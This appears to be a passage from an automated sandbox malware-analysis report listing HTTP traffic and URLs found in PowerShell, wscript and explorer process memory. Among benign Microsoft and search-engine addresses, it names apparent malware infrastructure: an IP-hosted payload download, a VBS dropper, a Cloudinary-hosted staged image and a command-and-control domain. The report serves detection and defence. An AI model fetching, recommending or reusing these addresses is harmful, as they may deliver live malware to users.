                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 10:09:54 GMTServer: Apache/2.4.59 (Debian)Content-Length: 409Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 39 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 70 72 6f 6c 69 6e 69 63 65 2e 67 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>
                Source: powershell.exe, 00000004.00000002.1762483774.0000000004F17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.27.144/250/sweetnes
                Source: powershell.exe, 00000004.00000002.1762483774.0000000004F17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1767676409.0000000008171000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.27.144/250/sweetnessgoodforgreatnessthingswithgood.tIF
                Source: powershell.exe, 00000004.00000002.1766198522.00000000072DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.27.144/250/sweetnessgoodforgreatnessthingswithgood.tIFI
                Source: powershell.exe, 00000004.00000002.1761871752.0000000002C5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.27.144/250/sweetnessgoodforgreatnessthingswithgood.tIFLMEM
                Source: powershell.exe, 00000004.00000002.1767676409.00000000081EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.27.144/250/sweetnessgoodforgreatnessthingswithgood.tIFuuC:
                Source: explorer.exe, 0000000E.00000000.1999335079.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1994245178.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2904691070.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: powershell.exe, 00000004.00000002.1767676409.0000000008171000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                Source: explorer.exe, 0000000E.00000000.1999335079.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1994245178.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2904691070.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: explorer.exe, 0000000E.00000000.1999335079.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1994245178.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2904691070.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: powershell.exe, 00000004.00000002.1762483774.00000000051B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                Source: powershell.exe, 00000004.00000002.1764099136.0000000005A9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1940207997.000000000582E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: explorer.exe, 0000000E.00000000.1999335079.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1994245178.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2904691070.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: explorer.exe, 0000000E.00000000.1994245178.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                Source: powershell.exe, 00000008.00000002.1940207997.0000000004917000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: explorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/
                Source: explorer.exe, 00000011.00000002.2249471749.0000000002CAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/2:i
                Source: explorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0
                Source: explorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2249471749.0000000002CB9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2230991897.0000000002C78000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2220685342.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.2230962875.00000000032E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.2893723974.0000000002CF5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2428964622.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2894572076.0000000002D07000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2893893666.00000000008C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2894417010.0000000002AA7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2894362131.00000000005B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/index.php
                Source: explorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/index.phpH
                Source: explorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2220685342.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.2230962875.00000000032E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.2893723974.0000000002CF5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2428964622.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2894572076.0000000002D07000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2893893666.00000000008C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2894417010.0000000002AA7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2894362131.00000000005B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/index.phpMozilla/5.0
                Source: explorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/j
                Source: explorer.exe, 00000011.00000002.2249471749.0000000002CAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/ll
                Source: explorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/ndex.php
                Source: explorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga:80/index.phposoft
                Source: explorer.exe, 0000000E.00000002.2903801891.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.2903005039.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.2000821408.0000000009B60000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                Source: powershell.exe, 00000004.00000002.1762483774.0000000004B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: powershell.exe, 00000004.00000002.1762483774.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1940207997.00000000047C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000004.00000002.1762483774.0000000004B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                Source: powershell.exe, 00000008.00000002.1940207997.0000000004917000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: explorer.exe, 0000000E.00000000.2004435868.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2909647286.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                Source: explorer.exe, 0000000E.00000000.1994245178.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
                Source: explorer.exe, 0000000E.00000000.1994245178.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
                Source: powershell.exe, 00000004.00000002.1762483774.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1940207997.00000000047C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: powershell.exe, 00000004.00000002.1762483774.0000000004B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                Source: explorer.exe, 0000000E.00000002.2909647286.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2004435868.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                Source: explorer.exe, 0000000E.00000002.2904691070.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1999335079.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                Source: explorer.exe, 0000000E.00000002.2904691070.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1999335079.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
                Source: explorer.exe, 0000000E.00000002.2898011121.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1991503224.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1989328162.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2893667075.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: explorer.exe, 0000000E.00000000.1999335079.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2904691070.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2904691070.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1999335079.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                Source: explorer.exe, 0000000E.00000000.1999335079.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2904691070.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
                Source: explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
                Source: explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                Source: explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
                Source: explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                Source: explorer.exe, 0000000E.00000000.1994245178.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
                Source: explorer.exe, 0000000E.00000000.1994245178.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
                Source: explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: powershell.exe, 00000008.00000002.1940207997.000000000582E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000008.00000002.1940207997.000000000582E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000008.00000002.1940207997.000000000582E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: explorer.exe, 0000000E.00000002.2909647286.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2004435868.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                Source: powershell.exe, 00000008.00000002.1940207997.0000000004917000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dahall/taskscheduler
                Source: sweetnessgoodforgreatnessthingswith.vbS.4.drString found in binary or memory: https://github.com/koswald/VBScript
                Source: wscript.exe, 00000007.00000003.1731003803.000000000592F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1731407928.0000000005561000.00000004.00000020.00020000.00000000.sdmp, sweetnessgoodforgreatnessthingswithgood[1].tiff.4.dr, sweetnessgoodforgreatnessthingswith.vbS.4.drString found in binary or memory: https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs
                Source: wscript.exe, 00000007.00000003.1728279245.0000000003597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs0
                Source: wscript.exe, 00000007.00000003.1727917587.0000000005461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1731232667.0000000003020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1734359512.000000000566B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1731003803.000000000592F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1731407928.0000000005561000.00000004.00000020.00020000.00000000.sdmp, sweetnessgoodforgreatnessthingswithgood[1].tiff.4.dr, sweetnessgoodforgreatnessthingswith.vbS.4.drString found in binary or memory: https://github.com/koswald/VBScript/blob/master/SetupPerUser.md
                Source: powershell.exe, 00000004.00000002.1762483774.00000000051B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
                Source: explorer.exe, 0000000E.00000000.1994245178.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
                Source: powershell.exe, 00000004.00000002.1767676409.00000000081D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/tX3.PowerShell.dllReporting/icrosoft.WindowsErrorRep
                Source: powershell.exe, 00000004.00000002.1764099136.0000000005A9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1940207997.000000000582E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: explorer.exe, 0000000E.00000002.2909647286.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2004435868.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
                Source: explorer.exe, 0000000E.00000002.2909647286.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2004435868.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                Source: powershell.exe, 00000008.00000002.1940207997.0000000004917000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com
                Source: powershell.exe, 00000008.00000002.1939177634.0000000002AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dnkr4s5yg/image/upload/v173542088
                Source: powershell.exe, 00000008.00000002.1939934208.0000000004290000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg
                Source: powershell.exe, 00000008.00000002.1940207997.0000000004917000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpgt
                Source: powershell.exe, 00000008.00000002.1971873914.0000000006E09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882W
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 0000000E.00000000.2004435868.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2909647286.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
                Source: explorer.exe, 0000000E.00000002.2909647286.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2004435868.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                Source: explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1994245178.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
